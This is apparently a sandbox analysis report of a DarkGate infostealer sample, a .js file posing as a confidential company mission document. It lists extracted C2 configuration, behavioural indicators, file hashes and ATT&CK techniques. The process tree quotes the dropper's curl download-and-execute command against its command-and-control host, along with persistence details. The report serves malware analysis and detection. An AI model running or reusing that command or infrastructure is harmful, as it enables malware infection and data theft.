darkgate | d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
175s
max time network
180s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2023 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
Size

49KB
MD5

c19568c51692a5b4dbfc29c02fafcf8d
SHA1

b265c4f15c591a241d19c7284efeeb1e73407df0
SHA256

c8c425368b40c30a09a8e4990e53a1df4c29493ad138287493da0d6f56f1dade
SHA512

329efccd2808ffd1ee7c6e741890aad2ee22705bd0c2703a11f054e6d29520964c39edfb039cf3834c0e23990994b95748edb74944fdfad1d8c78e5adc9b4dbc
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Dxt7niEL:nAIMFFdYMxAcEQDFXL

Score

10^/10

darkgate ricoc3 stealer

Malware Config

Extracted

Family

darkgate

Botnet

Ricoc3

http://hgfdytrywq.com

Attributes

alternative_c2_port
8080
anti_analysis
false
anti_debug
false
anti_vm
false
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_rawstub
true
crypto_key
hpBBFgfpMQrScI
internal_mutex
txtMut
minimum_disk
100
minimum_ram
4096
ping_interval
4
rootkit
true
startup_persistence
true
username
Ricoc3

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs

description	pid	Process	procid_target
PID 1500 created 4396	1500	Autoit3.exe	83
PID 1500 created 3776	1500	Autoit3.exe	17
PID 1500 created 1836	1500	Autoit3.exe	84
PID 1500 created 4396	1500	Autoit3.exe	83
PID 1500 created 4396	1500	Autoit3.exe	83
PID 1500 created 2568	1500	Autoit3.exe	12
PID 1500 created 3712	1500	Autoit3.exe	20
PID 1500 created 2292	1500	Autoit3.exe	82
PID 1500 created 2452	1500	Autoit3.exe	11
PID 1500 created 3556	1500	Autoit3.exe	21
PID 1500 created 3712	1500	Autoit3.exe	20
PID 1500 created 3776	1500	Autoit3.exe	17
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 3712	1812	cmd.exe	20
PID 1812 created 3712	1812	cmd.exe	20
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 3776	1812	cmd.exe	17
PID 1812 created 3872	1812	cmd.exe	19
PID 1812 created 2568	1812	cmd.exe	12
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 2568	1812	cmd.exe	12
PID 1812 created 3712	1812	cmd.exe	20
PID 1812 created 3712	1812	cmd.exe	20
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2568	1812	cmd.exe	12
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2408	1812	cmd.exe	10
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 2452	1812	cmd.exe	11
PID 1812 created 3872	1812	cmd.exe	19
PID 1812 created 3872	1812	cmd.exe	19
PID 1812 created 3556	1812	cmd.exe	21
PID 1812 created 3712	1812	cmd.exe	20
PID 1812 created 756	1812	cmd.exe	72
PID 1812 created 3872	1812	cmd.exe	19

Blocklisted process makes network request 64 IoCs

flow	pid	Process
43	1812	cmd.exe
42	1812	cmd.exe
44	1812	cmd.exe
45	1812	cmd.exe
46	1812	cmd.exe
47	1812	cmd.exe
48	1812	cmd.exe
49	1812	cmd.exe
50	1812	cmd.exe
51	1812	cmd.exe
52	1812	cmd.exe
53	1812	cmd.exe
54	1812	cmd.exe
55	1812	cmd.exe
56	1812	cmd.exe
60	1812	cmd.exe
61	1812	cmd.exe
62	1812	cmd.exe
63	1812	cmd.exe
64	1812	cmd.exe
65	1812	cmd.exe
66	1812	cmd.exe
67	1812	cmd.exe
68	1812	cmd.exe
69	1812	cmd.exe
70	1812	cmd.exe
71	1812	cmd.exe
72	1812	cmd.exe
73	1812	cmd.exe
74	1812	cmd.exe
75	1812	cmd.exe
76	1812	cmd.exe
77	1812	cmd.exe
78	1812	cmd.exe
79	1812	cmd.exe
80	1812	cmd.exe
81	1812	cmd.exe
82	1812	cmd.exe
83	1812	cmd.exe
84	1812	cmd.exe
85	1812	cmd.exe
86	1812	cmd.exe
87	1812	cmd.exe
88	1812	cmd.exe
89	1812	cmd.exe
90	1812	cmd.exe
94	1812	cmd.exe
96	1812	cmd.exe
97	1812	cmd.exe
98	1812	cmd.exe
99	1812	cmd.exe
100	1812	cmd.exe
101	1812	cmd.exe
102	1812	cmd.exe
103	1812	cmd.exe
104	1812	cmd.exe
105	1812	cmd.exe
106	1812	cmd.exe
107	1812	cmd.exe
108	1812	cmd.exe
109	1812	cmd.exe
110	1812	cmd.exe
111	1812	cmd.exe
112	1812	cmd.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\caheedh.lnk	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1500	Autoit3.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1500 set thread context of 1812	1500	Autoit3.exe	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1500	Autoit3.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe
1812	cmd.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2292 wrote to memory of 4396	2292	wscript.exe	83
PID 2292 wrote to memory of 4396	2292	wscript.exe	83
PID 4396 wrote to memory of 3824	4396	cmd.exe	85
PID 4396 wrote to memory of 3824	4396	cmd.exe	85
PID 4396 wrote to memory of 2560	4396	cmd.exe	86
PID 4396 wrote to memory of 2560	4396	cmd.exe	86
PID 4396 wrote to memory of 1500	4396	cmd.exe	88
PID 4396 wrote to memory of 1500	4396	cmd.exe	88
PID 4396 wrote to memory of 1500	4396	cmd.exe	88
PID 1500 wrote to memory of 1812	1500	Autoit3.exe	97
PID 1500 wrote to memory of 1812	1500	Autoit3.exe	97
PID 1500 wrote to memory of 1812	1500	Autoit3.exe	97
PID 1500 wrote to memory of 1812	1500	Autoit3.exe	97
PID 1500 wrote to memory of 1812	1500	Autoit3.exe	97

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2452

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2568

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3776

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3872

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3712

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3556

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:756

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb & Autoit3.exe sejtnt.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4396
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1836
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://hgfdytrywq.com:80
    3⤵
    PID:3824
- - C:\Windows\system32\curl.exe
    curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb
    3⤵
    PID:2560
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe sejtnt.au3
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Blocklisted process makes network request
      Drops startup file
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\fghhgdf\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\ProgramData\fghhgdf\ehbdbhb\baecfbe

Filesize
166B

MD5
830abc0db26445a45a21cf4c8f6b3979

SHA1
1f476e3f0d7a8be4297767777bd70fccead13f98

SHA256
625b328d8d7f789cb6b4bbe8aea1373d3accc6274d2838bfcf92af6ec9b61ac6

SHA512
c441f5a6776ba7d9a609d253c221568ec25b8bcac1ae0e0bd66fbb8feaa1b51b1c89207b0d57c354b7dc64e0a0bba888c38f6276a8e014c473a93fcb3652e97e

Download Submit
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\sejtnt.au3

Filesize
487KB

MD5
4c5474759bd10c4fd072e73ae027b733

SHA1
6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

SHA256
be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

SHA512
b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

Download Submit
\??\c:\temp\eebhfbe.au3

Filesize
487KB

MD5
4c5474759bd10c4fd072e73ae027b733

SHA1
6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

SHA256
be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

SHA512
b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

Download Submit
memory/1500-6-0x0000000001A40000-0x0000000001E40000-memory.dmp

Filesize
4.0MB

Download
memory/1500-8-0x0000000004CF0000-0x0000000005022000-memory.dmp

Filesize
3.2MB

Download
memory/1500-15-0x0000000004CF0000-0x0000000005022000-memory.dmp

Filesize
3.2MB

Download
memory/1500-16-0x0000000004CF0000-0x0000000005022000-memory.dmp

Filesize
3.2MB

Download
memory/1500-18-0x0000000004CF0000-0x0000000005022000-memory.dmp

Filesize
3.2MB

Download
memory/1500-17-0x0000000004CF0000-0x0000000005022000-memory.dmp

Filesize
3.2MB

Download
memory/1500-19-0x0000000001A40000-0x0000000001E40000-memory.dmp

Filesize
4.0MB

Download
memory/1500-22-0x0000000004CF0000-0x0000000005022000-memory.dmp

Filesize
3.2MB

Download
memory/1812-53-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-62-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-23-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-25-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-29-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-30-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-31-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-33-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-34-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-35-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-36-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-42-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-43-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-44-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-45-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-46-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-48-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-47-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-49-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-50-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-51-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-52-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-20-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-56-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-55-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-57-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-59-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-60-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-61-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-21-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-63-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-64-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-65-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-66-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-68-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-67-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-69-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-70-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-71-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-72-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-73-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-74-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-75-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-76-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-77-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-78-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-80-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-81-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-82-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-85-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-84-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-86-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-87-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-88-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-89-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-90-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-91-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/1812-92-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download